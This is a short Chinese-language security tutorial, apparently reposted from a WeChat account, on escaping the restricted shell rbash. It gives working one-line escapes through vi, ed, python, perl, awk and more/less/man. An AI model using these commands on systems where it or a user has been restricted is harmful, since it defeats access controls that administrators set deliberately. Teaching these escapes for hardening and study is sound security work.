rbash绕过总结
rbash
rbash(Restricted bash)受限bash,管理员可以指定某个普通用户为rbash以此限制其操作,设置为rbash后,很多行为和命令都会受限。
绕过rbash后,身份依旧是当前普通用户而非root,还需使用其他方法进行提权。
环境搭建
设置普通账户aaa为rbash。
这时aaa账户shell环境是rbash,部分命令受限。
绕过
vi绕过
命令如下:
vi
:set shell=/bin/sh
:shell
进入vi后,输入:set shell=/bin/sh回车。
接着输入:shell,回车后会返回一个$
尝试cd /etc到etc目录。
成功绕过rbash。
ed绕过
ed与vi操作类似,也是内联编辑模式,命令如下:
ed
!'/bin/sh'
sh、bash、dash绕过
默认情况下,可以在rbash中执行sh、bash、dash等命令,以此来绕过rbash。
如果这些命令不能运行,而cp可以,则可以把这些文件复制到其他目录运行,如果/不能被执行,则复制到其他目录的文件也不能执行。
python、perl绕过
可以尝试运行python和perl命令,如果允许执行,则可以用程序来调用bin/bash绕过rbash。
命令如下:
# python
python -c 'import os; os.system("/bin/sh");'
# perl
perl -e 'system("/bin/sh");'
awk绕过
awk命令通过BEGIN参数来指定执行前的语句,命令如下:
awk 'BEGIN {system("/bin/sh")}'
more绕过
more读取文件内容时,可以在内联编辑模式中输入!'sh'进入sh绕过rbash,这个需要当前目录有文件可读,例如这里是在当前用户的家目录,则都会有.bashrc等文件,命令如下:
more .bashrc
!'sh'
还有类似于more的可命令,如less、man等,用法类似。
总结
愿大家健康开心。
原文始发于微信公众号(AlertSec):rbash绕过总结
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论